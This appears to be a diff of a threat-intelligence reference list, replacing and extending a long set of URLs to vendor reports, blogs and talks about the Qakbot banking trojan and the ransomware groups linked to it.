- "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf",
- "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks",
- "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf",
- "https://quosecgmbh.github.io/blog/grap_qakbot_strings.html",
- "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
- "https://redcanary.com/blog/intelligence-insights-december-2021",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
- "https://www.group-ib.com/blog/egregor",
- "https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken--the-resurgence-of-the-emotet-botnet-malw.html",
- "https://www.bleepingcomputer.com/news/security/qbot-malware-switches-to-new-windows-installer-infection-vector/",
- "https://www.trendmicro.com/en_us/research/21/k/qakbot-loader-returns-with-new-techniques-and-tools.html",
- "https://twitter.com/kienbigmummy/status/1460537501676802051",
- "https://www.bleepingcomputer.com/news/security/fujifilm-shuts-down-network-after-suspected-ransomware-attack/",
- "https://isc.sans.edu/diary/rss/26862",
- "https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs",
- "https://blog.reversinglabs.com/blog/spotting-malicious-excel4-macros",
- "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike",
- "https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/",
- "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/",
- "https://seguranca-informatica.pt/a-taste-of-the-latest-release-of-qakbot",
- "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta",
- "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-1/",
- "https://www.bleepingcomputer.com/news/security/qbot-needs-only-30-minutes-to-steal-your-credentials-emails/",
- "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
- "https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot",
- "https://blog.minerva-labs.com/a-new-datoploader-delivers-qakbot-trojan",
- "https://www.zscaler.com/blogs/security-research/ares-banking-trojan-learns-old-tricks-adds-defunct-qakbot-dga",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
- "https://blog.quosec.net/posts/grap_qakbot_navigation/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
- "https://experience.mandiant.com/trending-evil/p/1",
- "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/",
- "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
- "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html",
- "https://www.youtube.com/watch?v=4I0LF8Vm7SI",
- "https://isc.sans.edu/diary/rss/28728",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf",
- "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
- "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7",
- "https://hatching.io/blog/reversing-qakbot",
- "https://redcanary.com/blog/intelligence-insights-november-2021/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
- "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/",
- "https://twitter.com/tylabs/status/1462195377277476871",
- "https://www.0ffset.net/reverse-engineering/malware-analysis/qakbot-browser-hooking-p1/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://www.elastic.co/de/security-labs/qbot-malware-analysis",
- "https://isc.sans.edu/diary/rss/28568",
- "https://twitter.com/Corvid_Cyber/status/1455844008081641472",
- "https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/",
- "https://www.elastic.co/security-labs/qbot-malware-analysis",
- "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/",
- "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html",
- "https://socprime.com/blog/qbot-malware-detection-old-dog-new-tricks/",
- "https://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques",
- "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/",
"https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://www.techtimes.com/articles/274190/20220412/qbot-botnet-deploys-malware-payloads-through-malicious-windows-installers.htm",
- "https://www.socinvestigation.com/qbot-spreads-via-lnk-files-detection-response/",
- "https://www.atomicmatryoshka.com/post/malware-headliners-qakbot",
- "https://www.malwarology.com/2022/04/qakbot-series-api-hashing/",
- "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
- "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex",
- "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
- "https://www.youtube.com/watch?v=iB1psRMtlqg",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-countermeasures/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://madlabs.dsu.edu/madrid/blog/2021/04/30/qbot-analyzing-php-proxy-scripts-from-compromised-web-server/",
- "https://www.malwarology.com/2022/04/qakbot-series-string-obfuscation/",
- "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html",
- "https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7",
- "https://isc.sans.edu/forums/diary/XLSB+Files+Because+Binary+is+Stealthier+Than+XML/28476/",
- "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/",
- "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
- "https://blog.morphisec.com/qakbot-qbot-maldoc-two-new-techniques",
- "https://blog.vincss.net/2021/03/re021-qakbot-dangerous-malware-has-been-around-for-more-than-a-decade.html",
- "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/demystifying-qbot-malware.html",
- "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.bleepingcomputer.com/news/security/qbot-phishing-uses-windows-calculator-sideloading-to-infect-devices/",
- "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "http://www.secureworks.com/research/threat-profiles/gold-lagoon",
- "https://raw.githubusercontent.com/NtQuerySystemInformation/Malware-RE-papers/main/Qakbot%20report.pdf",
- "https://news.sophos.com/en-us/2022/03/10/qakbot-injects-itself-into-the-middle-of-your-conversations/",
- "https://www.intrinsec.com/egregor-prolock/",
- "https://drive.google.com/file/d/1mO2Zb-Q94t39DvdASd4KNTPBD8JdkyC3/view",
- "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf",
- "https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/",
- "https://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html",
- "https://www.fortinet.com/blog/threat-research/new-variant-of-qakbot-spread-by-phishing-emails",
- "https://twitter.com/ChouchWard/status/1405168040254316547",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
- "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/",
- "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern",
- "https://www.youtube.com/watch?v=M22c1JgpG-U",
- "https://isc.sans.edu/diary/rss/28448",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
- "https://www.bitsight.com/blog/emotet-botnet-rises-again",
- "https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/",
- "https://experience.mandiant.com/trending-evil-2/p/1",
- "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/",
- "https://perception-point.io/insights-into-an-excel-4-0-macro-attack-using-qakbot-malware",
+ "https://www.bleepingcomputer.com/news/security/qbot-needs-only-30-minutes-to-steal-your-credentials-emails/",
+ "https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html",
+ "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html",
+ "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/qakbot-browser-hooking-p1/",
"https://twitter.com/elisalem9/status/1381859965875462144",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
- "https://www.linkedin.com/posts/zayedaljaberi_hunting-recent-qakbot-malware-activity-6903498764984606720-2Gl4",
- "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise",
- "https://www.silentpush.com/blog/malicious-infrastructure-as-a-service",
- "https://www.malwarology.com/2022/04/qakbot-series-configuration-extraction/",
- "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/",
- "https://www.malwarology.com/posts/2-qakbot-conf-extraction/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://twitter.com/redcanary/status/1334224861628039169",
+ "https://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques",
+ "https://documents.trendmicro.com/assets/pdf/Technical-Brief---The-Prelude-to-Ransomware-A-Look-into-Current-QAKBOT-Capabilities-and-Activity.pdf",
+ "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/demystifying-qbot-malware.html",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
+ "https://isc.sans.edu/diary/rss/28568",
+ "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/",
+ "https://www.splunk.com/en_us/blog/security/from-macros-to-no-macros-continuous-malware-improvements-by-qakbot.html",
+ "https://medium.com/walmartglobaltech/qbot-testing-malvertising-campaigns-3e2552cbc69a",
"https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf",
- "https://securityintelligence.com/news/qbot-malware-using-windows-defender-antivirus-lure/"
+ "https://blog.morphisec.com/qakbot-qbot-maldoc-two-new-techniques",
+ "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
+ "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/",
+ "https://twitter.com/tylabs/status/1462195377277476871",
+ "https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies",
+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
+ "https://www.malwarology.com/2022/04/qakbot-series-configuration-extraction/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.dsih.fr/article/5020/comment-qbot-revient-en-force-avec-onenote.html",
+ "https://securityintelligence.com/news/qbot-malware-using-windows-defender-antivirus-lure/",
+ "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html",
+ "https://blog.group-ib.com/prometheus-tds",
+ "https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken--the-resurgence-of-the-emotet-botnet-malw.html",
+ "https://blog.minerva-labs.com/a-new-datoploader-delivers-qakbot-trojan",
+ "https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html",
+ "https://www.youtube.com/watch?v=OCRyEUhiEyw",
+ "https://www.elastic.co/security-labs/qbot-configuration-extractor",
+ "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise",
+ "https://isc.sans.edu/diary/rss/28728",
+ "https://www.silentpush.com/blog/malicious-infrastructure-as-a-service",
+ "http://contagiodump.blogspot.com/2010/11/template.html",
+ "https://syrion.me/malware/qakbot-bb-extractor/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://quosecgmbh.github.io/blog/grap_qakbot_navigation.html",
+ "https://twitter.com/embee_research/status/1592067841154756610?s=20",
+ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution",
+ "https://docs.velociraptor.app/blog/2023/2023-04-05-qakbot/",
+ "https://www.malwarology.com/2022/04/qakbot-series-process-injection/",
+ "https://madlabs.dsu.edu/madrid/blog/2021/04/30/qbot-analyzing-php-proxy-scripts-from-compromised-web-server/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta",
+ "https://unit42.paloaltonetworks.com/tutorial-qakbot-infection/",
+ "https://www.malwarology.com/2022/04/qakbot-series-api-hashing/",
+ "https://www.f5.com/labs/articles/threat-intelligence/qbot-banking-trojan-still-up-to-its-old-tricks",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
+ "https://www.malwarology.com/posts/2-qakbot-conf-extraction/",
+ "https://www.reliaquest.com/blog/qbot-black-basta-ransomware/",
+ "https://www.malwarology.com/posts/1-qakbot-strings-obfuscation/",
+ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
+ "https://www.secureworks.com/research/threat-profiles/gold-lagoon",
+ "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html",
+ "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
+ "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/",
+ "https://research.loginsoft.com/threat-research/blog-maximizing-threat-detections-of-qakbot-with-osquery/",
+ "https://www.youtube.com/watch?v=M22c1JgpG-U",
+ "https://experience.mandiant.com/trending-evil/p/1",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/qakbot-evolves-to-onenote-malware-distribution.html",
+ "https://www.bleepingcomputer.com/news/security/qbot-malware-switches-to-new-windows-installer-infection-vector/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://github.com/binref/refinery/blob/master/tutorials/tbr-files.v0x06.Qakbot.Decoder.ipynb",
+ "https://isc.sans.edu/forums/diary/XLSB+Files+Because+Binary+is+Stealthier+Than+XML/28476/",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
+ "https://www.atomicmatryoshka.com/post/malware-headliners-qakbot",
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf",
+ "https://www.malwarology.com/2022/04/qakbot-series-string-obfuscation/",
+ "https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/decrypting-qakbots-encrypted-registry-keys/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html",
+ "https://www.trendmicro.com/en_us/research/21/k/qakbot-loader-returns-with-new-techniques-and-tools.html",
+ "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
+ "https://quosecgmbh.github.io/blog/grap_qakbot_strings.html",
+ "https://twitter.com/Corvid_Cyber/status/1455844008081641472",
+ "https://blog.reversinglabs.com/blog/spotting-malicious-excel4-macros",
+ "https://socprime.com/blog/qbot-malware-detection-old-dog-new-tricks/",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
+ "https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/",
+ "https://raw.githubusercontent.com/NtQuerySystemInformation/Malware-RE-papers/main/Qakbot%20report.pdf",
+ "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://twitter.com/_alex_il_/status/1384094623270727685",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://twitter.com/TheDFIRReport/status/1361331598344478727",
+ "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/",
+ "https://bin.re/blog/the-dga-of-qakbot/",
+ "https://isc.sans.edu/diary/rss/28448",
+ "https://redcanary.com/blog/intelligence-insights-november-2021/",
+ "https://www.elastic.co/security-labs/qbot-malware-analysis",
+ "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/",
+ "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-countermeasures/",
+ "https://www.elastic.co/de/security-labs/qbot-malware-analysis",
+ "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot",
+ "https://twitter.com/Unit42_Intel/status/1461004489234829320",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf",
+ "https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html",
+ "https://www.bleepingcomputer.com/news/security/qbot-phishing-uses-windows-calculator-sideloading-to-infect-devices/",
+ "https://www.youtube.com/watch?v=iB1psRMtlqg",
+ "https://twitter.com/kienbigmummy/status/1460537501676802051",
+ "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/",
+ "https://drive.google.com/file/d/1mO2Zb-Q94t39DvdASd4KNTPBD8JdkyC3/view",
+ "https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot",
+ "https://www.tidalcyber.com/blog/identifying-and-defending-against-qakbots-evolving-ttps",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
+ "https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/",
+ "https://twitter.com/embee_research/status/1592067841154756610?s=20&t=hEALPAWr1LIt9pXcVpxjRQ",
+ "https://www.bitsight.com/blog/emotet-botnet-rises-again",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
+ "https://perception-point.io/insights-into-an-excel-4-0-macro-attack-using-qakbot-malware",
+ "http://www.secureworks.com/research/threat-profiles/gold-lagoon",
+ "https://redcanary.com/blog/intelligence-insights-december-2021",
+ "https://blog.talosintelligence.com/following-the-lnk-metadata-trail",
+ "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot",
+ "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis",
+ "https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://news.sophos.com/en-us/2022/03/10/qakbot-injects-itself-into-the-middle-of-your-conversations/",
+ "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
+ "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html",
+ "https://www.group-ib.com/blog/egregor",
+ "https://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html",
+ "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/",
+ "https://blog.cyble.com/2023/02/17/the-many-faces-of-qakbot-malware-a-look-at-its-diverse-distribution-methods/",
+ "https://www.netresec.com/?page=Blog&month=2023-03&post=QakBot-C2-Traffic",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
+ "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7",
+ "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf",
+ "https://www.securityhomework.net/articles/qakbot_ccs_prioritization_and_new_record_types/qakbot_ccs_prioritization_and_new_record_types.php",
+ "https://securelist.com/qakbot-technical-analysis/103931/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-1/",
+ "https://www.socinvestigation.com/qbot-spreads-via-lnk-files-detection-response/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/",
+ "https://www.youtube.com/watch?v=4I0LF8Vm7SI",
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "https://www.malwarology.com/posts/4-qakbot-api-hashing/",
+ "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks",
+ "https://www.circl.lu/pub/tr-64/",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/",
+ "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/",
+ "https://www.group-ib.com/blog/prolock_evolution",
+ "https://experience.mandiant.com/trending-evil-2/p/1",
+ "https://hatching.io/blog/reversing-qakbot",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf",
+ "https://blog.quosec.net/posts/grap_qakbot_navigation/",
+ "https://sublime.security/blog/detecting-qakbot-wsf-attachments-onenote-files-and-generic-attack-surface-reduction",
+ "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html",
+ "https://blog.quosec.net/posts/grap_qakbot_strings/",
+ "https://news.sophos.com/en-us/2023/02/06/qakbot-onenote-attacks/",
+ "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern",
+ "https://www.um.edu.mt/library/oar/handle/123456789/76802",
+ "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/",
+ "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf",
+ "https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7",
+ "https://micahbabinski.medium.com/html-smuggling-detection-5adefebb6841",
+ "https://www.intrinsec.com/egregor-prolock/",
+ "https://www.linkedin.com/posts/zayedaljaberi_hunting-recent-qakbot-malware-activity-6903498764984606720-2Gl4",
+ "https://twitter.com/redcanary/status/1334224861628039169",
+ "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/",
+ "https://seguranca-informatica.pt/a-taste-of-the-latest-release-of-qakbot",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
+ "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns",
+ "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://www.malwarology.com/posts/3-qakbot-process-injection/",
+ "https://www.zscaler.com/blogs/security-research/ares-banking-trojan-learns-old-tricks-adds-defunct-qakbot-dga",
+ "https://blog.vincss.net/2021/03/re021-qakbot-dangerous-malware-has-been-around-for-more-than-a-decade.html",
+ "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf",
+ "https://twitter.com/ChouchWard/status/1405168040254316547",
+ "https://www.techtimes.com/articles/274190/20220412/qbot-botnet-deploys-malware-payloads-through-malicious-windows-installers.htm",
+ "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/",
+ "https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf",
+ "https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta",
+ "https://malwareandstuff.com/upnp-messing-up-security-since-years/",
+ "https://asec.ahnlab.com/en/44662/",
+ "https://www.bleepingcomputer.com/news/security/fujifilm-shuts-down-network-after-suspected-ransomware-attack/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://lab52.io/blog/bypassing-qakbot-anti-analysis-tactics/",
+ "https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer",
+ "https://isc.sans.edu/diary/rss/26862",
+ "https://www.rapid7.com/blog/post/2023/04/18/automating-qakbot-detection-at-scale-with/",
+ "https://blog.eclecticiq.com/qakbot-malware-used-unpatched-vulnerability-to-bypass-windows-os-security-feature",
+ "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex",
+ "https://www.fortinet.com/blog/threat-research/new-variant-of-qakbot-spread-by-phishing-emails",
+ "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/",
+ "https://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html",
+ "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-analyzing-a-fowl-banking-trojan-part-1/",
